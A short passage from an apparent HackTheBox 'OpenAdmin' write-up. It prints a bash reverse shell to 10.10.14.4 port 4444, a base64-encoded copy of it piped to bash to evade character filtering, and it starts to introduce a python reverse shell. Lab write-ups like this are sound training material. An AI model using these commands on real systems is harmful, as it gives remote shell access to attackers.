jkobierczynski/hackthebox/openadmin/openadmin.md

 drwxr-x--- 6 joanna joanna 4096 Nov 28  2019 joanna
 ```

+Also we cannot execute any normal reverse shell command as any special character is interpreted as html tags:

 ```
 $ bash -i >& /dev/tcp/10.10.14.4/4444 0>&1                                                                                        $ echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQ0NDQgMD4mMQo= | base64 -d | bash
 ```

+To make things easier, we create a python reverse shell script in a upload directory:

 ```
 $ cat reverse.py